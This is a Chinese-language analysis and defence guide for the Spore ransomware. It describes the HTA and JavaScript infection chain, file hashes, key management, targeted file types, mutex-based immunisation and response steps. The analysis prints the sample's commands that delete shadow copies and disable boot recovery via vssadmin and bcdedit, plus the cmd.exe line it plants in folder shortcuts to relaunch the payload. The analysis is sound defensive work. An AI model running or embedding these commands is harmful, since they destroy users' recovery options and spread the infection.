Spore勒索软件分析
字数 1501 2025-08-25 22:58:56
Spore勒索软件深度分析与防御指南
一、Spore勒索软件概述
Spore是一款具有高度组织化的勒索软件,主要通过电子邮件传播,具有以下显著特点:
- 完美的密钥管理机制,无需C&C服务器上传密钥
- 提供简洁的勒索解密网站(支持聊天功能和免疫方案)
- 通过文件夹快捷方式进行传播
二、感染流程分析
1. 初始感染阶段
- 文件类型:HTA (HTML Application)
- MD5:37477dec05d8ae50aa5204559c81bde3
- 行为:
- 在临时目录释放close.js文件并执行
- 该JS文件经过多层加密(MD5:fc1b2bec47aaa059319f4a47cb37c5e2)
2. JS文件行为
- 多层解密后释放并运行一个伪造的docx文件(仅写入1字节)
- 故意使docx文件崩溃,分散用户注意力
- 最终释放并执行真正的勒索软件EXE
3. 主勒索程序
- 文件类型:EXE
- 大小:19,456字节
- MD5:312445d2cca1cf82406af567596b9d8c
- 加壳:UPX 2.90
- 编译时间:2017-01-09 23:44:29
三、技术细节分析
1. 系统检测
- 获取ntdll.dll主版本号判断系统版本(XP或更高)
- 获取硬盘序列号,前缀加"m"创建互斥体
- 若互斥体已存在则退出
2. 密钥生成与管理
- 生成1024位RSA公私钥对
- 导出公私钥并混合计算机信息(时间、计算机名等)
- 计算混合信息的MD5哈希
- 创建AES-256密钥:
- 用AES加密RSA私钥
- 用硬编码的RSA公钥加密AES密钥
- 将加密数据存入密钥文件并复制到多个目录:
C:\CH775-9FETR-TZTZT-ROTRF.KEYC:\Documents and Settings\Administrator\Templates\CH775-9FETR-TZTZT-ROTRF.KEYC:\Documents and Settings\Administrator\桌面\CH775-9FETR-TZTZT-ROTRF.KEY
3. 文件加密过程
- 计算文件前80字节的CRC32值
- 创建新的AES密钥加密文件内容和CRC32值
- 计算AES密钥的CRC
- 将CRC和AES密钥写入加密文件
4. 目标文件类型
加密以下扩展名的文件:
xls, doc, xlsx, docx, rtf, odt, pdf, psd, dwg, cdr, cd, mdb, 1cd, dbf, sqlite, accdb, jpg, jpeg, tiff, zip, rar, 7z, backup
5. 排除目录
不加密以下目录:
Windows, Program Files, Program Files (x86), AppData
四、持久化与破坏机制
1. 系统破坏
执行以下命令:
vssadmin delete shadows /all /quiet
bcdedit /set {default} recoveryenabled no
bcdedit /set {default} bootstatuspolicy ignoreallfailures
- 删除所有卷影副本
- 禁用系统自动修复功能
2. 快捷方式感染
修改文件夹快捷方式,添加恶意代码:
C:\Windows\system32\cmd.exe /c explorer.exe "Windows" & type "0ae282d1-ebb3-fa26-c2c4-243ecd668970.exe" > "%tmp%\0ae282d1-ebb3-fa26-c2c4-243ecd668970.exe" & start "Windows" "%tmp%\0ae282d1-ebb3-fa26-c2c4-243ecd668970.exe"
五、勒索网站功能
- 提供解密服务购买
- 提供"免疫"服务购买(避免再次感染)
- 内置聊天功能实现受害者与攻击者沟通
- 价格相对其他勒索软件较低
六、防御与免疫方案
1. 主动免疫
预先创建互斥体:
- 获取硬盘序列号,前缀加"m"创建同名互斥体
- 样本检测到该互斥体存在时会自动退出
2. 预防措施
- 不打开可疑邮件附件
- 定期备份重要数据(离线备份)
- 禁用系统不必要的脚本执行功能
- 保持系统和安全软件更新
- 监控异常的系统进程和网络连接
3. 应急响应
- 立即隔离感染主机
- 检查并清除被感染的快捷方式
- 从备份恢复加密文件
- 使用专业工具尝试恢复卷影副本
七、技术总结
Spore勒索软件展现了高度专业化的开发水平:
- 完全离线的密钥管理方案
- 多层加密的模块化设计
- 精心设计的用户干扰策略
- 完善的持久化感染机制
- 商业化的勒索服务支持
这种勒索软件代表了现代恶意软件的发展趋势:将传统病毒技术与商业化服务模式相结合,形成完整的网络犯罪产业链。防御此类威胁需要结合技术防护、用户教育和完善的应急响应体系。